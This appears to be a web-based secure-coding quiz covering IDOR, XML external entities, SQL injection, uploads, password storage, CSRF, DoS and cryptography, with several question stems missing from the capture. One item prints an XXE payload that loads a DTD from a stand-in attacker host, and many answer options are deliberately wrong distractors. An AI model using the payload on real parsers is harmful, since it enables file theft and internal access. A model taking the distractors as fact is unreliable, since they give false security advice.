Test yourself!

Name:

E-mail:

I agree with the privacy policy!

1. Which of the URLs below are likely to be manipulated by an attacker to access a resource they shouldn't be able to access (Insecure Direct Object Reference)?

https://www.example.com/articles/220101-happy-new-year-from-examplecom

https://www.example.com/help?helpfile=docviewer.txt&language=en

https://www.example.com/documents/390c1890-2bd3-4f3a-878f-ed896a2979c7

https://www.example.com/users/134/messages

https://www.example.com/invoices/19374

3. Take this XML:

<?xml version="1.0" ?> <!DOCTYPE evil [ <!ENTITY % dtd SYSTEM "https://evil.hacker.com/evil.dtd"> %dtd; %dosomething; ]> <a>&x;</a>
Assuming that the attacker is in control of https://evil.hacker.com/evil.dtd, which of the following can the attacker realistically force our program to do when we parse this XML file?

Consume extreme amounts of memory.

Read an arbitrary file from the file system.

Infect other XML files on our machine to make them malicious as well.

Access an intranet server's functionality.

Deploy malware to the server.

I agree with the privacy policy!

Choose one	Correct	Partially	Wrong
Nothing in particular, SQL injection is a solved problem in 2022.
Use an ORM such as Hibernate, Entity Framework or SQLAlchemy.
Use static stored procedures or server-side parameterized / prepared statements.
Escape control characters such as single and double quotes.
Use noSQL databases such as MongoDB, Cosmos DB or DynamoDB, since they are immune to SQL injection.

Choose one	Correct	Partially	Wrong
Store uploaded files in a directory outside the web application's webroot.
Only accept the file if its extension ends with .jpg.
Validate the Content-Type header and only allow the upload if it is "image/jpeg".
Attempt to open the file via the JPEG parser library, and verify that it opens correctly.
Set the filename yourself instead of relying on the one given by the user.

Choose one	Correct	Partially	Wrong
"Password recovery": reverse all user password hashes to recover them, then use the plaintext passwords as input to Argon2 and update all stored passwords in the database.
"Forced upgrade": Zero out all password hashes and send all users an email to force them to recover their account (e.g. by using one-time codes sent out to them at time of registration) and set a new password. Once a user has gone through the password recovery process, use their new password as input to Argon2 and store the result in the database.
"Soft upgrade": When a user logs in, once they've managed to successfully authenticate, use the password they entered as input to Argon2 and store it in the database, replacing their old password hash.
See "Forced upgrade", but also keep a copy of the old password database around to make sure users don't pick the same password they had before.
See "Soft upgrade", but also rehash all old MD5 password hashes with Argon2 immediately, and verify this double hash on login (Argon2(MD5(password))) until a user has successfully logged in and had their password upgraded.

Choose one	Correct	Partially	Wrong
Only printable ASCII characters should be used in a password (verified via an allowlist).
Passwords should be at least 14 characters long.
A denylist should be used to reject dictionary words and patterns like "qwertyuiop".
Copy and paste functionality should be disallowed on the login screen.
Users should change (rotate) their passwords regularly.

Choose one	Correct	Partially	Wrong
Generate a random token value for each session, store it in a cookie, and append it to all URLs in the generated HTML. Then verify that both the URL parameter and the cookie are present and have the same value when processing each request.
There is no need to deal with CSRF anymore, since modern Web frameworks have built-in protection against it.
Set "SameSite=Lax" or "SameSite=Strict" as a cookie attribute.
Verify the "Origin" and "Referer" (sic!) headers on each request.
Generate a random token value for each session (or each request), store it as a session variable, and put it into all generated HTML pages so it's sent back to the server with each request. Then verify that the token is present and matches the session value when processing each request.

Choose one	Correct	Partially	Wrong
Wait until MegaBrainSoft publishes the patch, then update to the new version.
Disable JSON schema validation functionality in the code.
Calculate BrainF0g's temporal and environmental CVSS scores, with all the other steps this implies (e.g. trying out the proof-of-concept exploit code in a test environment).
Immediately switch out the JSON parser for another vendor's product.
Rewrite the validation function so that the JSON schema validator is only called if the JSON is well-formed in the first place.

Choose one	Correct	Partially	Wrong
SYN flood and ping of death.
Regular Expression Denial of Service (ReDoS).
A Distributed Denial of Service (DDoS) attack where each node makes HEAD requests to the server.
Uploading an XML bomb or decompression bomb via the appropriate interface.
Slow attacks such as Slowloris and RUDY.

Choose one	Correct	Partially	Wrong
Older encryption algorithms (like AES) should be deprecated in favor of elliptic curve cryptography due to advances in quantum computing.
If using a block cipher, the ECB mode of operation should never be used.
The initialization vector should be hard-coded to ensure consistency when encrypting data.
A strong random number generator (TRNG or CSPRNG) is a prerequisite for using cryptographic algorithms.
Message Authentication Codes and digital signatures are both used to protect data integrity, authenticity, and non-repudiation.